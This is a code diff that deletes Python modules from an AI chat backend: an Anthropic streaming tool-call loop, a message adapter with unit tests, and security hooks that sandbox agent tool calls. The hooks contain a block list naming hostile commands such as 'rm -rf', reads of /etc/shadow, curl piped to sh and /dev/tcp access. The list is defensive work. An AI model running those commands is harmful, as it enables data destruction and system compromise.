# Maximum tool-call iterations before stopping to prevent infinite loops
_MAX_TOOL_ITERATIONS = 10
async def stream_with_anthropic(
session: ChatSession,
system_prompt: str,
text_block_id: str,
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream using Anthropic SDK directly with tool calling support.
This function accumulates messages into the session for persistence.
The caller should NOT yield an additional StreamFinish - this function handles it.
"""
import anthropic
# Use config.api_key (CHAT_API_KEY > OPEN_ROUTER_API_KEY > OPENAI_API_KEY)
# with config.base_url for OpenRouter routing — matching the non-SDK path.
api_key = config.api_key
if not api_key:
yield StreamError(
errorText="No API key configured (set CHAT_API_KEY or OPENAI_API_KEY)",
code="config_error",
)
yield StreamFinish()
return
# Build kwargs for the Anthropic client — use base_url if configured
client_kwargs: dict[str, Any] = {"api_key": api_key}
if config.base_url:
# Strip /v1 suffix — Anthropic SDK adds its own version path
base = config.base_url.rstrip("/")
if base.endswith("/v1"):
base = base[:-3]
client_kwargs["base_url"] = base
client = anthropic.AsyncAnthropic(**client_kwargs)
tool_definitions = get_tool_definitions()
tool_handlers = get_tool_handlers()
anthropic_tools = [
{
"name": t["name"],
"description": t["description"],
"input_schema": t["inputSchema"],
}
for t in tool_definitions
]
anthropic_messages = _convert_session_to_anthropic(session)
if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
anthropic_messages.append(
{"role": "user", "content": "Continue with the task."}
)
has_started_text = False
accumulated_text = ""
accumulated_tool_calls: list[dict[str, Any]] = []
for _ in range(_MAX_TOOL_ITERATIONS):
try:
async with client.messages.stream(
model=(
config.model.split("/")[-1] if "/" in config.model else config.model
),
max_tokens=4096,
system=system_prompt,
messages=cast(Any, anthropic_messages),
tools=cast(Any, anthropic_tools) if anthropic_tools else [],
) as stream:
async for event in stream:
if event.type == "content_block_start":
block = event.content_block
if hasattr(block, "type"):
if block.type == "text" and not has_started_text:
yield StreamTextStart(id=text_block_id)
has_started_text = True
elif block.type == "tool_use":
yield StreamToolInputStart(
toolCallId=block.id, toolName=block.name
)
elif event.type == "content_block_delta":
delta = event.delta
if hasattr(delta, "type") and delta.type == "text_delta":
accumulated_text += delta.text
yield StreamTextDelta(id=text_block_id, delta=delta.text)
final_message = await stream.get_final_message()
if final_message.stop_reason == "tool_use":
if has_started_text:
yield StreamTextEnd(id=text_block_id)
has_started_text = False
text_block_id = str(uuid.uuid4())
tool_results = []
assistant_content: list[dict[str, Any]] = []
for block in final_message.content:
if block.type == "text":
assistant_content.append(
{"type": "text", "text": block.text}
)
elif block.type == "tool_use":
assistant_content.append(
{
"type": "tool_use",
"id": block.id,
"name": block.name,
"input": block.input,
}
)
# Track tool call for session persistence
accumulated_tool_calls.append(
{
"id": block.id,
"type": "function",
"function": {
"name": block.name,
"arguments": json.dumps(
block.input
if isinstance(block.input, dict)
else {}
),
},
}
)
yield StreamToolInputAvailable(
toolCallId=block.id,
toolName=block.name,
input=(
block.input if isinstance(block.input, dict) else {}
),
)
output, is_error = await _execute_tool(
block.name, block.input, tool_handlers
)
yield StreamToolOutputAvailable(
toolCallId=block.id,
toolName=block.name,
output=output,
success=not is_error,
)
# Save tool result to session
session.messages.append(
ChatMessage(
role="tool",
content=output,
tool_call_id=block.id,
)
)
tool_results.append(
{
"type": "tool_result",
"tool_use_id": block.id,
"content": output,
"is_error": is_error,
}
)
# Save assistant message with tool calls to session
session.messages.append(
ChatMessage(
role="assistant",
content=accumulated_text or None,
tool_calls=(
accumulated_tool_calls
if accumulated_tool_calls
else None
),
)
)
# Reset for next iteration
accumulated_text = ""
accumulated_tool_calls = []
anthropic_messages.append(
{"role": "assistant", "content": assistant_content}
)
anthropic_messages.append({"role": "user", "content": tool_results})
continue
else:
if has_started_text:
yield StreamTextEnd(id=text_block_id)
# Save final assistant response to session
if accumulated_text:
session.messages.append(
ChatMessage(role="assistant", content=accumulated_text)
)
yield StreamUsage(
promptTokens=final_message.usage.input_tokens,
completionTokens=final_message.usage.output_tokens,
totalTokens=final_message.usage.input_tokens
+ final_message.usage.output_tokens,
)
yield StreamFinish()
return
except Exception as e:
logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
yield StreamError(
errorText="An error occurred. Please try again.",
code="anthropic_error",
)
yield StreamFinish()
return
yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
yield StreamFinish()
def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
"""Convert session messages to Anthropic format.
Handles merging consecutive same-role messages (Anthropic requires alternating roles).
"""
messages: list[dict[str, Any]] = []
for msg in session.messages:
if msg.role == "user":
new_msg = {"role": "user", "content": msg.content or ""}
elif msg.role == "assistant":
content: list[dict[str, Any]] = []
if msg.content:
content.append({"type": "text", "text": msg.content})
if msg.tool_calls:
for tc in msg.tool_calls:
func = tc.get("function", {})
args = func.get("arguments", {})
if isinstance(args, str):
try:
args = json.loads(args)
except json.JSONDecodeError:
args = {}
content.append(
{
"type": "tool_use",
"id": tc.get("id", str(uuid.uuid4())),
"name": func.get("name", ""),
"input": args,
}
)
if content:
new_msg = {"role": "assistant", "content": content}
else:
continue # Skip empty assistant messages
elif msg.role == "tool":
new_msg = {
"role": "user",
"content": [
{
"type": "tool_result",
"tool_use_id": msg.tool_call_id or "",
"content": msg.content or "",
}
],
}
else:
continue
messages.append(new_msg)
# Merge consecutive same-role messages (Anthropic requires alternating roles)
return _merge_consecutive_roles(messages)
def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
"""Merge consecutive messages with the same role.
Anthropic API requires alternating user/assistant roles.
"""
if not messages:
return []
merged: list[dict[str, Any]] = []
for msg in messages:
if merged and merged[-1]["role"] == msg["role"]:
# Merge with previous message
prev_content = merged[-1]["content"]
new_content = msg["content"]
# Normalize both to list-of-blocks form
if isinstance(prev_content, str):
prev_content = [{"type": "text", "text": prev_content}]
if isinstance(new_content, str):
new_content = [{"type": "text", "text": new_content}]
# Ensure both are lists
if not isinstance(prev_content, list):
prev_content = [prev_content]
if not isinstance(new_content, list):
new_content = [new_content]
merged[-1]["content"] = prev_content + new_content
else:
merged.append(msg)
return merged
async def _execute_tool(
tool_name: str, tool_input: Any, handlers: dict[str, Any]
) -> tuple[str, bool]:
"""Execute a tool and return (output, is_error)."""
handler = handlers.get(tool_name)
if not handler:
return f"Unknown tool: {tool_name}", True
try:
result = await handler(tool_input)
# Safely extract output - handle empty or missing content
content = result.get("content") or []
if content and isinstance(content, list) and len(content) > 0:
first_item = content[0]
output = first_item.get("text", "") if isinstance(first_item, dict) else ""
else:
output = ""
is_error = result.get("isError", False)
return output, is_error
except Exception as e:
return f"Error: {str(e)}", True

View File

@@ -1,212 +0,0 @@
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This module provides the adapter layer that converts streaming messages from
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
the frontend expects.
"""
import json
import logging
import uuid
from claude_agent_sdk import (
AssistantMessage,
Message,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from backend.api.features.chat.sdk.tool_adapter import (
MCP_TOOL_PREFIX,
pop_pending_tool_output,
)
logger = logging.getLogger(__name__)
class SDKResponseAdapter:
"""Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This class maintains state during a streaming session to properly track
text blocks, tool calls, and message lifecycle.
"""
def __init__(self, message_id: str | None = None):
self.message_id = message_id or str(uuid.uuid4())
self.text_block_id = str(uuid.uuid4())
self.has_started_text = False
self.has_ended_text = False
self.current_tool_calls: dict[str, dict[str, str]] = {}
self.task_id: str | None = None
self.step_open = False
def set_task_id(self, task_id: str) -> None:
"""Set the task ID for reconnection support."""
self.task_id = task_id
def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
"""Convert a single SDK message to Vercel AI SDK format."""
responses: list[StreamBaseResponse] = []
if isinstance(sdk_message, SystemMessage):
if sdk_message.subtype == "init":
responses.append(
StreamStart(messageId=self.message_id, taskId=self.task_id)
)
# Open the first step (matches non-SDK: StreamStart then StreamStartStep)
responses.append(StreamStartStep())
self.step_open = True
elif isinstance(sdk_message, AssistantMessage):
# After tool results, the SDK sends a new AssistantMessage for the
# next LLM turn. Open a new step if the previous one was closed.
if not self.step_open:
responses.append(StreamStartStep())
self.step_open = True
for block in sdk_message.content:
if isinstance(block, TextBlock):
if block.text:
self._ensure_text_started(responses)
responses.append(
StreamTextDelta(id=self.text_block_id, delta=block.text)
)
elif isinstance(block, ToolUseBlock):
self._end_text_if_open(responses)
# Strip MCP prefix so frontend sees "find_block"
# instead of "mcp__copilot__find_block".
tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
responses.append(
StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
)
responses.append(
StreamToolInputAvailable(
toolCallId=block.id,
toolName=tool_name,
input=block.input,
)
)
self.current_tool_calls[block.id] = {"name": tool_name}
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results back from tool execution.
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_info = self.current_tool_calls.get(block.tool_use_id, {})
tool_name = tool_info.get("name", "unknown")
# Prefer the stashed full output over the SDK's
# (potentially truncated) ToolResultBlock content.
# The SDK truncates large results, writing them to disk,
# which breaks frontend widget parsing.
output = pop_pending_tool_output(tool_name) or (
_extract_tool_output(block.content)
)
responses.append(
StreamToolOutputAvailable(
toolCallId=block.tool_use_id,
toolName=tool_name,
output=output,
success=not (block.is_error or False),
)
)
# Close the current step after tool results — the next
# AssistantMessage will open a new step for the continuation.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
elif isinstance(sdk_message, ResultMessage):
self._end_text_if_open(responses)
# Close the step before finishing.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
# Emit token usage if the SDK reported it
usage = getattr(sdk_message, "usage", None) or {}
if usage:
input_tokens = usage.get("input_tokens", 0)
output_tokens = usage.get("output_tokens", 0)
responses.append(
StreamUsage(
promptTokens=input_tokens,
completionTokens=output_tokens,
totalTokens=input_tokens + output_tokens,
)
)
if sdk_message.subtype == "success":
responses.append(StreamFinish())
elif sdk_message.subtype in ("error", "error_during_execution"):
error_msg = getattr(sdk_message, "result", None) or "Unknown error"
responses.append(
StreamError(errorText=str(error_msg), code="sdk_error")
)
responses.append(StreamFinish())
else:
logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
return responses
def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
"""Start (or restart) a text block if needed."""
if not self.has_started_text or self.has_ended_text:
if self.has_ended_text:
self.text_block_id = str(uuid.uuid4())
self.has_ended_text = False
responses.append(StreamTextStart(id=self.text_block_id))
self.has_started_text = True
def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
"""End the current text block if one is open."""
if self.has_started_text and not self.has_ended_text:
responses.append(StreamTextEnd(id=self.text_block_id))
self.has_ended_text = True
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract a string output from a ToolResultBlock's content field."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [item.get("text", "") for item in content if item.get("type") == "text"]
if parts:
return "".join(parts)
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)
if content is None:
return ""
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)

View File

@@ -1,366 +0,0 @@
"""Unit tests for the SDK response adapter."""
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
)
from .response_adapter import SDKResponseAdapter
from .tool_adapter import MCP_TOOL_PREFIX
def _adapter() -> SDKResponseAdapter:
a = SDKResponseAdapter(message_id="msg-1")
a.set_task_id("task-1")
return a
# -- SystemMessage -----------------------------------------------------------
def test_system_init_emits_start_and_step():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="init", data={}))
assert len(results) == 2
assert isinstance(results[0], StreamStart)
assert results[0].messageId == "msg-1"
assert results[0].taskId == "task-1"
assert isinstance(results[1], StreamStartStep)
def test_system_non_init_emits_nothing():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="other", data={}))
assert results == []
# -- AssistantMessage with TextBlock -----------------------------------------
def test_text_block_emits_step_start_and_delta():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "hello"
def test_empty_text_block_emits_only_step():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="")], model="test")
results = adapter.convert_message(msg)
# Empty text skipped, but step still opens
assert len(results) == 1
assert isinstance(results[0], StreamStartStep)
def test_multiple_text_deltas_reuse_block_id():
adapter = _adapter()
msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
r1 = adapter.convert_message(msg1)
r2 = adapter.convert_message(msg2)
# First gets step+start+delta, second only delta (block & step already started)
assert len(r1) == 3
assert isinstance(r1[0], StreamStartStep)
assert isinstance(r1[1], StreamTextStart)
assert len(r2) == 1
assert isinstance(r2[0], StreamTextDelta)
assert r1[1].id == r2[0].id # same block ID
# -- AssistantMessage with ToolUseBlock --------------------------------------
def test_tool_use_emits_input_start_and_available():
"""Tool names arrive with MCP prefix and should be stripped for the frontend."""
adapter = _adapter()
msg = AssistantMessage(
content=[
ToolUseBlock(
id="tool-1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"q": "x"},
)
],
model="test",
)
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamToolInputStart)
assert results[1].toolCallId == "tool-1"
assert results[1].toolName == "find_agent" # prefix stripped
assert isinstance(results[2], StreamToolInputAvailable)
assert results[2].toolName == "find_agent" # prefix stripped
assert results[2].input == {"q": "x"}
def test_text_then_tool_ends_text_block():
adapter = _adapter()
text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
adapter.convert_message(text_msg) # opens step + text
results = adapter.convert_message(tool_msg)
# Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamToolInputStart)
# -- UserMessage with ToolResultBlock ----------------------------------------
def test_tool_result_emits_output_and_finish_step():
adapter = _adapter()
# First register the tool call (opens step) — SDK sends prefixed name
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
model="test",
)
adapter.convert_message(tool_msg)
# Now send tool result
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
)
results = adapter.convert_message(result_msg)
assert len(results) == 2
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].toolCallId == "t1"
assert results[0].toolName == "find_agent" # prefix stripped
assert results[0].output == "found 3 agents"
assert results[0].success is True
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_error():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
],
model="test",
)
)
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].success is False
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_list_content():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
result_msg = UserMessage(
content=[
ToolResultBlock(
tool_use_id="t1",
content=[
{"type": "text", "text": "line1"},
{"type": "text", "text": "line2"},
],
)
]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].output == "line1line2"
assert isinstance(results[1], StreamFinishStep)
def test_string_user_message_ignored():
"""A plain string UserMessage (not tool results) produces no output."""
adapter = _adapter()
results = adapter.convert_message(UserMessage(content="hello"))
assert results == []
# -- ResultMessage -----------------------------------------------------------
def test_result_success_emits_finish_step_and_finish():
adapter = _adapter()
# Start some text first (opens step)
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="done")], model="test")
)
msg = ResultMessage(
subtype="success",
duration_ms=100,
duration_api_ms=50,
is_error=False,
num_turns=1,
session_id="s1",
)
results = adapter.convert_message(msg)
# TextEnd + FinishStep + StreamFinish
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamFinishStep)
assert isinstance(results[2], StreamFinish)
def test_result_error_emits_error_and_finish():
adapter = _adapter()
msg = ResultMessage(
subtype="error",
duration_ms=100,
duration_api_ms=50,
is_error=True,
num_turns=0,
session_id="s1",
result="API rate limited",
)
results = adapter.convert_message(msg)
# No step was open, so no FinishStep — just Error + Finish
assert len(results) == 2
assert isinstance(results[0], StreamError)
assert "API rate limited" in results[0].errorText
assert isinstance(results[1], StreamFinish)
# -- Text after tools (new block ID) ----------------------------------------
def test_text_after_tool_gets_new_block_id():
adapter = _adapter()
# Text -> Tool -> ToolResult -> Text should get a new text block ID and step
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="before")], model="test")
)
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
# Send tool result (closes step)
adapter.convert_message(
UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
)
results = adapter.convert_message(
AssistantMessage(content=[TextBlock(text="after")], model="test")
)
# Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "after"
# -- Full conversation flow --------------------------------------------------
def test_full_conversation_flow():
"""Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
adapter = _adapter()
all_responses: list[StreamBaseResponse] = []
# 1. Init
all_responses.extend(
adapter.convert_message(SystemMessage(subtype="init", data={}))
)
# 2. Assistant text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
)
)
# 3. Tool use
all_responses.extend(
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(
id="t1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"query": "email"},
)
],
model="test",
)
)
)
# 4. Tool result
all_responses.extend(
adapter.convert_message(
UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
)
)
)
# 5. More text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
)
)
# 6. Result
all_responses.extend(
adapter.convert_message(
ResultMessage(
subtype="success",
duration_ms=500,
duration_api_ms=400,
is_error=False,
num_turns=2,
session_id="s1",
)
)
)
types = [type(r).__name__ for r in all_responses]
assert types == [
"StreamStart",
"StreamStartStep", # step 1: text + tool call
"StreamTextStart",
"StreamTextDelta", # "Let me search"
"StreamTextEnd", # closed before tool
"StreamToolInputStart",
"StreamToolInputAvailable",
"StreamToolOutputAvailable", # tool result
"StreamFinishStep", # step 1 closed after tool result
"StreamStartStep", # step 2: continuation text
"StreamTextStart", # new block after tool
"StreamTextDelta", # "I found 2"
"StreamTextEnd", # closed by result
"StreamFinishStep", # step 2 closed
"StreamFinish",
]

View File

@@ -1,393 +0,0 @@
"""Security hooks for Claude Agent SDK integration.
This module provides security hooks that validate tool calls before execution,
ensuring multi-user isolation and preventing unauthorized operations.
"""
import json
import logging
import os
import re
import shlex
from typing import Any, cast
from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
logger = logging.getLogger(__name__)
# Tools that are blocked entirely (CLI/system access)
BLOCKED_TOOLS = {
"bash",
"shell",
"exec",
"terminal",
"command",
}
# Safe read-only commands allowed in the sandboxed Bash tool.
# These are data-processing / inspection utilities — no writes, no network.
ALLOWED_BASH_COMMANDS = {
# JSON / structured data
"jq",
# Text processing
"grep",
"egrep",
"fgrep",
"rg",
"head",
"tail",
"cat",
"wc",
"sort",
"uniq",
"cut",
"tr",
"sed",
"awk",
"column",
"fold",
"fmt",
"nl",
"paste",
"rev",
# File inspection (read-only)
"find",
"ls",
"file",
"stat",
"du",
"tree",
"basename",
"dirname",
"realpath",
# Utilities
"echo",
"printf",
"date",
"true",
"false",
"xargs",
"tee",
# Comparison / encoding
"diff",
"comm",
"base64",
"md5sum",
"sha256sum",
}
# Tools allowed only when their path argument stays within the SDK workspace.
# The SDK uses these to handle oversized tool results (writes to tool-results/
# files, then reads them back) and for workspace file operations.
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
SANDBOXED_BASH_TOOLS = {"Bash"}
# Dangerous patterns in tool inputs
DANGEROUS_PATTERNS = [
r"sudo",
r"rm\s+-rf",
r"dd\s+if=",
r"/etc/passwd",
r"/etc/shadow",
r"chmod\s+777",
r"curl\s+.*\|.*sh",
r"wget\s+.*\|.*sh",
r"eval\s*\(",
r"exec\s*\(",
r"__import__",
r"os\.system",
r"subprocess",
]
def _deny(reason: str) -> dict[str, Any]:
"""Return a hook denial response."""
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": reason,
}
}
def _validate_workspace_path(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate that a workspace-scoped tool only accesses allowed paths.
Allowed directories:
- The SDK working directory (``/tmp/copilot-<session>/``)
- The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
"""
path = tool_input.get("file_path") or tool_input.get("path") or ""
if not path:
# Glob/Grep without a path default to cwd which is already sandboxed
return {}
resolved = os.path.normpath(os.path.expanduser(path))
# Allow access within the SDK working directory
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
return {}
# Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
return {}
logger.warning(
f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
)
return _deny(
f"Tool '{tool_name}' can only access files within the workspace directory."
)
def _validate_bash_command(
tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate a Bash command against the allowlist of safe commands.
Only read-only data-processing commands are allowed (jq, grep, head, etc.).
Blocks command substitution, output redirection, and disallowed executables.
Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
containing ``|`` won't be mistaken for shell pipes).
"""
command = tool_input.get("command", "")
if not command or not isinstance(command, str):
return _deny("Bash command is empty.")
# Block command substitution — can smuggle arbitrary commands
if "$(" in command or "`" in command:
return _deny("Command substitution ($() or ``) is not allowed in Bash.")
# Block output redirection — Bash should be read-only
if re.search(r"(?<!\d)>{1,2}\s", command):
return _deny("Output redirection (> or >>) is not allowed in Bash.")
# Block /dev/ access (e.g., /dev/tcp for network)
if "/dev/" in command:
return _deny("Access to /dev/ is not allowed in Bash.")
# Tokenize with shlex (respects quotes), then extract command names.
# shlex preserves shell operators like | ; && || as separate tokens.
try:
tokens = shlex.split(command)
except ValueError:
return _deny("Malformed command (unmatched quotes).")
# Walk tokens: the first non-assignment token after a pipe/separator is a command.
expect_command = True
for token in tokens:
if token in ("|", "||", "&&", ";"):
expect_command = True
continue
if expect_command:
# Skip env var assignments (VAR=value)
if "=" in token and not token.startswith("-"):
continue
cmd_name = os.path.basename(token)
if cmd_name not in ALLOWED_BASH_COMMANDS:
allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
logger.warning(f"Blocked Bash command: {cmd_name}")
return _deny(
f"Command '{cmd_name}' is not allowed. "
f"Allowed commands: {allowed}"
)
expect_command = False
# Validate absolute file paths stay within workspace
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
for token in tokens:
if not token.startswith("/"):
continue
resolved = os.path.normpath(token)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
continue
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
continue
logger.warning(f"Blocked Bash path outside workspace: {token}")
return _deny(
f"Bash can only access files within the workspace directory. "
f"Path '{token}' is outside the workspace."
)
return {}
def _validate_tool_access(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Validate that a tool call is allowed.
Returns:
Empty dict to allow, or dict with hookSpecificOutput to deny
"""
# Block forbidden tools
if tool_name in BLOCKED_TOOLS:
logger.warning(f"Blocked tool access attempt: {tool_name}")
return _deny(
f"Tool '{tool_name}' is not available. "
"Use the CoPilot-specific tools instead."
)
# Sandboxed Bash: only allowlisted commands, workspace-scoped paths
if tool_name in SANDBOXED_BASH_TOOLS:
return _validate_bash_command(tool_input, sdk_cwd)
# Workspace-scoped tools: allowed only within the SDK workspace directory
if tool_name in WORKSPACE_SCOPED_TOOLS:
return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
# Check for dangerous patterns in tool input
# Use json.dumps for predictable format (str() produces Python repr)
input_str = json.dumps(tool_input) if tool_input else ""
for pattern in DANGEROUS_PATTERNS:
if re.search(pattern, input_str, re.IGNORECASE):
logger.warning(
f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
)
return _deny("Input contains blocked pattern")
return {}
def _validate_user_isolation(
tool_name: str, tool_input: dict[str, Any], user_id: str | None
) -> dict[str, Any]:
"""Validate that tool calls respect user isolation."""
# For workspace file tools, ensure path doesn't escape
if "workspace" in tool_name.lower():
path = tool_input.get("path", "") or tool_input.get("file_path", "")
if path:
# Check for path traversal
if ".." in path or path.startswith("/"):
logger.warning(
f"Blocked path traversal attempt: {path} by user {user_id}"
)
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": "Path traversal not allowed",
}
}
return {}
def create_security_hooks(
user_id: str | None, sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Create the security hooks configuration for Claude Agent SDK.
Includes security validation and observability hooks:
- PreToolUse: Security validation before tool execution
- PostToolUse: Log successful tool executions
- PostToolUseFailure: Log and handle failed tool executions
- PreCompact: Log context compaction events (SDK handles compaction automatically)
Args:
user_id: Current user ID for isolation validation
sdk_cwd: SDK working directory for workspace-scoped tool validation
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def pre_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Combined pre-tool-use validation hook."""
_ = context # unused but required by signature
tool_name = cast(str, input_data.get("tool_name", ""))
tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
# Strip MCP prefix for consistent validation
is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
# Only block non-CoPilot tools; our MCP-registered tools
# (including Read for oversized results) are already sandboxed.
if not is_copilot_tool:
result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
if result:
return cast(SyncHookJSONOutput, result)
# Validate user isolation
result = _validate_user_isolation(clean_name, tool_input, user_id)
if result:
return cast(SyncHookJSONOutput, result)
logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log successful tool executions for observability."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_failure_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log failed tool executions for debugging."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
error = input_data.get("error", "Unknown error")
logger.warning(
f"[SDK] Tool failed: {tool_name}, error={error}, "
f"user={user_id}, tool_use_id={tool_use_id}"
)
return cast(SyncHookJSONOutput, {})
async def pre_compact_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log when SDK triggers context compaction.
The SDK automatically compacts conversation history when it grows too large.
This hook provides visibility into when compaction happens.
"""
_ = context, tool_use_id
trigger = input_data.get("trigger", "auto")
logger.info(
f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
)
return cast(SyncHookJSONOutput, {})
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
